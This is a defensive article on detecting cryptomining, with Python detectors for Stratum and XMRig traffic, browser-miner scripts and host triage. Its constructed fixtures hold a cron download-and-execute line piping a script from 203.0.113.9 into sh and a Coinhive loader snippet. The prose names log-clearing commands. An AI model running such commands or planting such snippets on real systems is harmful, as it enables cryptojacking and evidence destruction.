There are already many professional articles online about detecting cryptomining. Here the author summarizes them and adds some of his own not yet mature ideas; discussion from fellow practitioners is welcome. As usual, detection proceeds from two directions: detection at the traffic layer and detection of host behavior.

I. Traffic features
For mining traffic, the protocol everyone knows is Stratum, the pool protocol originally designed for Bitcoin pools and since adopted by Ethereum and most other coins. The author will not analyze the protocol itself here; instead let's look at its features. A typical Stratum message looks like this:
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.0"]}
Two things stand out: the keyword mining (every Stratum method name begins with mining.) and the JSON format.
XMRig communication protocol (JSON-RPC): XMRig, the most common Monero CPU miner, speaks a JSON-RPC dialect of Stratum.
Our defender-side detection rules are mainly keyword matches on mining, jsonrpc, seed_hash, job_id and similar sensitive fields, followed by a check that the packet body is JSON. For Monero (XMR) mining there is generally a login packet and a submit packet; correlating the two on the same connection reduces false positives, so the rule mainly matches the login and submit keywords.
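The following Python detector is an added example (not code from the original article) of the rules just described, run over constructed JSON-RPC lines: it tags Stratum mining.* methods and XMRig login/submit/job messages, correlates login and submit on the same flow so that a lone login from an ordinary JSON-RPC API stays low-confidence, and applies the wallet-address prefix heuristic mentioned in the note below to the pool username. The flow labels, the wallet string and the pool addresses are all constructed.

```python
import json
import re
from collections import defaultdict

# Method names of Stratum ("mining.*") and of XMRig's JSON-RPC dialect.
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit",
                   "mining.notify", "mining.set_difficulty"}
XMRIG_METHODS = {"login", "submit", "job", "keepalived"}
# Fields of an XMRig job object (sent in the login reply and in job pushes).
JOB_FIELDS = {"job_id", "seed_hash", "blob", "target"}

# Wallet-address prefix/alphabet heuristics (the "bank card prefix" idea).
BASE58 = r"[1-9A-HJ-NP-Za-km-z]"
WALLET_PATTERNS = {
    "XMR": re.compile(rf"^[48]{BASE58}{{94}}$"),              # Monero address, 95 chars
    "BTC-legacy": re.compile(rf"^[13]{BASE58}{{25,34}}$"),    # Bitcoin P2PKH / P2SH
    "BTC-bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$"),  # Bitcoin segwit
}


def wallet_type(username):
    """Classify a pool username as a wallet address type, or None.
    Pools accept wallet.worker and wallet+difficulty, so strip the suffix."""
    base = re.split(r"[.+]", username, maxsplit=1)[0]
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(base):
            return kind
    return None


def classify_message(line):
    """Return (family, method, wallet-or-None) for one JSON-RPC line, else None."""
    try:
        msg = json.loads(line)
    except ValueError:
        return None
    if not isinstance(msg, dict):
        return None
    method, params = msg.get("method"), msg.get("params")
    if method in STRATUM_METHODS:
        # mining.authorize carries the pool username (often a wallet) as params[0]
        wallet = params[0] if method == "mining.authorize" and isinstance(params, list) and params else None
        return ("stratum", method, wallet if isinstance(wallet, str) else None)
    if method in XMRIG_METHODS:
        wallet = params.get("login") if isinstance(params, dict) else None
        return ("xmrig", method, wallet if isinstance(wallet, str) else None)
    # Pool -> miner replies carry no method; a job object marks a login reply.
    result = msg.get("result")
    if isinstance(result, dict):
        job = result.get("job", result)
        if isinstance(job, dict) and JOB_FIELDS & set(job):
            return ("xmrig", "job", None)
    return None


def analyze(records):
    """records: iterable of (flow_key, payload_line). Returns per-flow verdicts."""
    flows = defaultdict(lambda: {"family": None, "methods": set(), "wallets": []})
    for flow, line in records:
        hit = classify_message(line)
        if hit is None:
            continue
        family, method, wallet = hit
        entry = flows[flow]
        entry["family"] = family
        entry["methods"].add(method)
        if wallet is not None:
            entry["wallets"].append((wallet, wallet_type(wallet)))
    verdicts = {}
    for flow, entry in flows.items():
        methods, family = entry["methods"], entry["family"]
        if family == "xmrig":
            # login + submit on one flow is a real session; a lone "login" is
            # also what ordinary JSON-RPC APIs look like, so keep it low.
            level = "high" if {"login", "submit"} <= methods else "low"
        else:
            level = "high" if "mining.submit" in methods else "medium"
        if level == "low" and any(kind for _, kind in entry["wallets"]):
            level = "medium"  # the username itself looks like a wallet address
        verdicts[flow] = {"level": level, "family": family,
                          "methods": sorted(methods), "wallets": entry["wallets"]}
    return verdicts


# Constructed sample traffic: one XMRig session, one cpuminer subscribe, one API.
FAKE_XMR_WALLET = "4" + ("xmr1TEST" * 12)[:94]   # constructed, not a real address
FLOW_MINER, FLOW_CPUMINER, FLOW_API = ("10.0.0.5 -> 203.0.113.9:3333",
                                       "10.0.0.7 -> 203.0.113.20:3333",
                                       "10.0.0.8 -> 198.51.100.4:443")
SAMPLE_FLOWS = [
    (FLOW_MINER, json.dumps({"id": 1, "jsonrpc": "2.0", "method": "login",
                             "params": {"login": FAKE_XMR_WALLET, "pass": "x", "agent": "XMRig/6.16.4"}})),
    (FLOW_MINER, json.dumps({"id": 1, "jsonrpc": "2.0", "error": None, "result": {
        "id": "sess1", "status": "OK",
        "job": {"blob": "0c0c", "job_id": "J1", "target": "ffffff00", "seed_hash": "00ab"}}})),
    (FLOW_MINER, json.dumps({"id": 2, "jsonrpc": "2.0", "method": "submit",
                             "params": {"id": "sess1", "job_id": "J1", "nonce": "deadbeef", "result": "00"}})),
    (FLOW_CPUMINER, '{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.0"]}'),
    (FLOW_API, json.dumps({"id": 7, "jsonrpc": "2.0", "method": "login",
                           "params": {"login": "alice", "pass": "hunter2"}})),
    (FLOW_API, json.dumps({"id": 8, "jsonrpc": "2.0", "method": "getStatus", "params": {}})),
]

if __name__ == "__main__":
    for flow, verdict in analyze(SAMPLE_FLOWS).items():
        print(flow, verdict)
```

Feeding it real data means reassembling TCP payloads per flow (Stratum is newline-delimited JSON over a long-lived connection), which is why the records are keyed by flow rather than by packet; the API flow shows why a bare login keyword rule fires too often.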
PS: we can also detect mining from the prefix of the wallet address, just as card numbers from China Merchants Bank, Agricultural Bank and other banks have distinct prefixes (the Monero addresses XMRig logs in with, for instance, start with 4 or 8 and are 95 characters long).

II. Threat intelligence
Work with the threat-intelligence teams to collect and tag mining-pool IPs, the domains and addresses the miners communicate with, wallet addresses, hashes of mining trojans, fingerprints of their encrypted traffic, and so on.
Mining incidents fall into active and passive types. Active is easy to understand: the host was compromised and a miner installed. What is passive? Browser mining.

I. Front-end browser mining (passive)
First, what is browser mining? An ordinary mining trojan burns the CPU and memory of the server it infected, computing on that compromised device. Browser mining instead consumes the CPU and memory of visitors' browsers: once a page embeds a mining script (some xxx.js), every user who opens the page starts mining for the attacker. The Coinhive script is the best-known example, with many imitations.
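As an added example, not code from the original article or from any miner, here is a Python scanner that implements the page-side checks this section describes for a fetched HTML document: regex matching of known mining-script names (the real Coinhive and Authedmine script paths plus a generic miner.js pattern that is an assumption), hash matching of inline script bodies against a known-bad set, and matching of Coinhive-style constructor and throttle calls. The sample HTML and its site key are constructed; the known-hash set is seeded from the sample itself to show the mechanism, whereas in practice it comes from threat intelligence.

```python
import hashlib
import re

# Script URLs of known browser miners. coinhive.min.js and authedmine.min.js
# were Coinhive's real library names; the generic miner.js pattern is an
# assumption that needs tuning against your own traffic.
MINER_SRC_PATTERNS = [
    re.compile(r"coinhive\.min\.js$", re.I),
    re.compile(r"authedmine\.min\.js$", re.I),
    re.compile(r"/(?:crypto|web)?miner(?:\.min)?\.js$", re.I),
]
# Constructor and control calls of the Coinhive-style JavaScript API.
MINER_INLINE_PATTERNS = [
    re.compile(r"new\s+CoinHive\.(?:Anonymous|User)\s*\(", re.I),
    re.compile(r"\.setThrottle\s*\(", re.I),
]
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r'\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def scan_html(html, known_hashes=frozenset()):
    """Return (kind, evidence) findings for every <script> in the page:
    kind is "src" (known miner URL), "hash" (known-bad inline body) or
    "inline" (miner API call in an inline script)."""
    findings = []
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:
            url = src.group(1).split("?")[0].split("#")[0]  # ignore cache busters
            if any(p.search(url) for p in MINER_SRC_PATTERNS):
                findings.append(("src", src.group(1)))
        body = body.strip()
        if not body:
            continue
        digest = sha256_hex(body)
        if digest in known_hashes:
            findings.append(("hash", digest))
        for p in MINER_INLINE_PATTERNS:
            m = p.search(body)
            if m:
                findings.append(("inline", m.group(0)))
                break
    return findings


# Constructed sample pages: one carrying a Coinhive loader and a made-up site key.
SAMPLE_MINER_INLINE = ("var miner = new CoinHive.Anonymous('SITE-KEY-CONSTRUCTED', "
                       "{throttle: 0.3}); miner.start();")
SAMPLE_HTML = f"""<html><head>
<script src="/static/app.js?v=3"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>{SAMPLE_MINER_INLINE}</script>
</head><body>hello</body></html>"""
BENIGN_HTML = """<html><head><script src="/static/app.js"></script>
<script>console.log("ok");</script></head><body></body></html>"""

if __name__ == "__main__":
    known = {sha256_hex(SAMPLE_MINER_INLINE)}   # stand-in for a threat-intel feed
    for finding in scan_html(SAMPLE_HTML, known_hashes=known):
        print(*finding)
```

The hash check only catches byte-identical scripts, so the name and API-call checks are what survive trivial re-packing; the CPU-usage and persistent-connection signals from the detection rules below are runtime observations that a static page scan cannot see and belong in the browser or proxy telemetry instead.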
Our defender-side detection rules are mainly regex matches on the names of common browser-mining scripts, MD5/hash matching of the script files, abnormal and sustained browser CPU and memory use, persistent requests to one address (the mining script keeps a connection open to its pool proxy), and early detection of the malicious domains.

II. Attack-chain detection (compromised host, or employees mining on their own)
Gaining a foothold (web vulnerabilities, phishing) -> mining malware sets up autostart / hides itself / maintains privileges -> mining malware moves laterally to find more machines to mine on
This is a fairly classic chain, and we can detect at each of these three points. How the foothold is gained is not covered in this article.
Autostart (rc.local at boot, crontab scheduled tasks, malicious system services registered with chkconfig, and on macOS the LaunchAgents and LaunchDaemons directories) / hiding (renaming files, renaming processes with prctl, hiding files) / lateral movement (port scanning, password brute force, then setting up autostart on the new host) is mainly inspected with IDS traffic devices. Then how do these techniques map onto the ATT&CK matrix, and how do we build defense in depth? First, let's look at the corresponding technique IDs (TIDs).
Let's go through it stage by stage. First comes discovery, the attacker's information collection. Rules for this stage must be correlated through CEP (complex event processing) rules, otherwise they produce many false positives. How to understand this? If an employee views the process list with tasklist /svc in the normal course of work, we cannot raise an alert on that alone. CEP correlates it with earlier operations: if the same host shortly before went through a frantic search of folders and checked the current user, this employee's host may be about to be used for mining. The technical difficulty lies in correlating the rules and in the low accuracy of the rules; the purpose is to catch the problem before it happens.
Execution stage: this stage also needs special attention. First, scheduled tasks in general: the Task Scheduler (taskschd) on Windows and crontab on Linux/macOS deserve our focus. We also need to check whether any JS scripts are malicious. On Linux machines, because many servers come with a Python environment, we need to watch the execution of Python files. And third-party loading is common: a loader.exe that downloads the mining malware remotely.
Technical difficulty 1: loading through a third party or a whitelisted binary. In many cases the attacker has already obtained privileges but rarely runs the mining malware directly; they drop a loader to fetch it, or abuse Windows whitelisted system binaries (living-off-the-land binaries) to load it. How do we defend against this? First, the loader: a domain whitelist, meaning we isolate and block access to any domain that is not a corporate or office domain. For whitelist loading we can use an endpoint application whitelist, where the rules only allow the listed DLLs and EXEs to run. If a domain whitelist is hard to implement, focus on outbound requests instead.
Persistence stage: autostart services (sc on Windows; rc.local, LaunchAgents, LaunchDaemons, etc. on Linux/macOS), scheduled tasks, registry run keys (reg; needs elevated privileges, so it is relatively sensitive), shadow users (net user).
Defense evasion stage: deleting logs (history, del, sfc, rd, wevtutil cl, eventvwr, dumpel.exe, reg delete "HKCU\Software\Microsoft\Terminal Server Client\Default" /va /f to clear the RDP connection history), hiding files (attrib), renaming processes (prctl), changing file and directory permissions (chmod), protocol obfuscation and encoding (even for encrypted traffic we can see who initiated it; trusted initiators can be allowed through and everything else blocked).
Windows log locations (not all are listed here):
Lateral movement stage: mining malware, like manual lateral movement, basically relies on weak passwords and simple brute force against ports such as 21, 22, 445 and 3389. What we need to do is close ports not required by the business, enforce a password policy, and restrict logins (for example lockout after repeated failures and source restrictions).
A brief summary: for attack-chain detection we still focus on the four stages of execution, persistence, defense evasion and lateral movement, because these four have relatively sensitive and obvious characteristics; for the discovery stage we correlate the related rules. On this point the author also has some not yet mature opinions. Making the defense watertight is, at least today, impossible. The key to raising the quality of defense is whether we can seize the initiative. Where does the defender's initiative lie? In what the attacker does not know about our environment, our architecture and our lines of defense. For example, the same command ipconfig can be replaced by an in-house variant that achieves the same effect: executing the standard form is then treated as dangerous and executing the variant as safe, and only we know which is which. This is just a thought; making it actionable depends on the reader's own effort.
For triage we usually use top to find the commands with high CPU usage (on Windows, wmic cpu get loadpercentage or Task Manager), netstat -ano to look for connections to external IPs and look those IPs up on a threat-intelligence platform such as ThreatBook (微步), the history of executed commands (on Windows, the event logs), and ps -ef to view processes (tasklist /svc on Windows), followed by a search for backdoor files. On Windows we mainly look at the registry, hidden users, backdoors in web services, scheduled tasks, and common backdoors such as startup items. On Linux we mainly look at scheduled tasks, whether SSH has been hijacked, autostart entries, and so on. For attribution we find the mining-pool IP or the wallet address, plus the methods and tools the attacker used to break in, and see whether related information can be analyzed from them.
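As an added example (not from the original article), the following Python script runs the Linux host-side checks from this triage step and the execution and persistence stages above over constructed ps and crontab output: a high-CPU process is only alerted on when a second signal joins it (pool URL or miner flags on the command line, a miner binary name, or a binary running from a temp directory), and cron entries are flagged for download-and-execute one-liners, pool URLs, miner names or temp-directory paths. The process names, pool host, wallet string, CPU threshold and patterns are assumptions for illustration; the Windows equivalents (tasklist, schtasks) would feed the same scoring.

```python
import re

# Signals from the triage steps above: high CPU, miner binary names, pool URLs
# and miner command-line flags, binaries run from temp directories, and cron
# entries that download-and-execute. Patterns and thresholds are assumptions.
POOL_URL = re.compile(r"stratum\+(?:tcp|ssl)://|\b(?:pool|mine|xmr)[\w.-]*\.[a-z]{2,}:\d{3,5}\b", re.I)
MINER_FLAGS = re.compile(r"--donate-level|-o\s+stratum|--algo[= ]|--coin[= ]|-u\s+[48][1-9A-HJ-NP-Za-km-z]{94}\b")
MINER_NAMES = re.compile(r"(?:^|/)(?:xmrig|minerd|cpuminer)\b", re.I)
DOWNLOAD_EXEC = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b|base64\s+(?:-d|--decode)", re.I)
TEMP_PATH = re.compile(r"(?:^|\s)/(?:tmp|dev/shm|var/tmp)/")
CPU_THRESHOLD = 80.0   # percent, as reported by ps/top


def parse_ps(text):
    """Parse `ps -eo pid,pcpu,user,args` output; the header line is skipped."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        try:
            procs.append({"pid": int(parts[0]), "pcpu": float(parts[1]),
                          "user": parts[2], "args": parts[3]})
        except ValueError:
            continue  # header or garbage
    return procs


def score_process(proc):
    """Return the list of reasons a process looks like a miner."""
    reasons = []
    exe, args = proc["args"].split()[0], proc["args"]
    if proc["pcpu"] >= CPU_THRESHOLD:
        reasons.append("high cpu")
    if MINER_NAMES.search(exe):
        reasons.append("miner binary name")
    if POOL_URL.search(args):
        reasons.append("pool url in args")
    if MINER_FLAGS.search(args):
        reasons.append("miner cli flags")
    if TEMP_PATH.search(exe):
        reasons.append("runs from temp dir")
    return reasons


def score_cron_line(line):
    """Return the list of reasons a crontab line looks like miner persistence."""
    reasons = []
    line = line.strip()
    if not line or line.startswith("#"):
        return reasons
    if DOWNLOAD_EXEC.search(line):
        reasons.append("download-and-execute")
    if POOL_URL.search(line):
        reasons.append("pool url")
    if MINER_NAMES.search(line):
        reasons.append("miner binary name")
    if TEMP_PATH.search(line):
        reasons.append("temp-dir path")
    return reasons


def triage(ps_text, cron_text):
    """Combine signals: a lone high-CPU process (a build job) is not an alert."""
    alerts = []
    for proc in parse_ps(ps_text):
        reasons = score_process(proc)
        if len(reasons) >= 2:
            alerts.append(("process", proc["pid"], reasons))
    for number, line in enumerate(cron_text.splitlines(), 1):
        reasons = score_cron_line(line)
        if reasons:
            alerts.append(("cron", number, reasons))
    return alerts


# Constructed sample output: a miner renamed to look like a kernel thread,
# a busy but legitimate Java process, and a crontab with two implants.
FAKE_WALLET = "4" + ("xmr1TEST" * 12)[:94]   # constructed, not a real address
SAMPLE_PS = f"""\
  PID %CPU USER     COMMAND
    1  0.0 root     /sbin/init
  812  2.1 www-data nginx: worker process
 2231 98.7 www-data /tmp/.X11-unix/kthreadd -o stratum+tcp://pool.example.net:3333 -u {FAKE_WALLET} --donate-level=1
 2250 85.0 jenkins  /usr/bin/java -jar /opt/jenkins/jenkins.war
"""
SAMPLE_CRON = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://203.0.113.9/x.sh | sh
@reboot /tmp/.X11-unix/kthreadd -c /tmp/.X11-unix/config.json
"""

if __name__ == "__main__":
    for alert in triage(SAMPLE_PS, SAMPLE_CRON):
        print(*alert)
```

The renamed binary shows why a process-name blacklist alone is weak: the article's prctl point means the name is attacker-controlled, while the pool URL, the wallet-shaped -u argument and the /tmp path are much harder for the miner to hide without breaking itself.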
As the offense-defense confrontation escalates, more and more technologies need to be studied: confrontation in the cloud, the study of algorithms. This was written roughly; if there are errors, please correct them.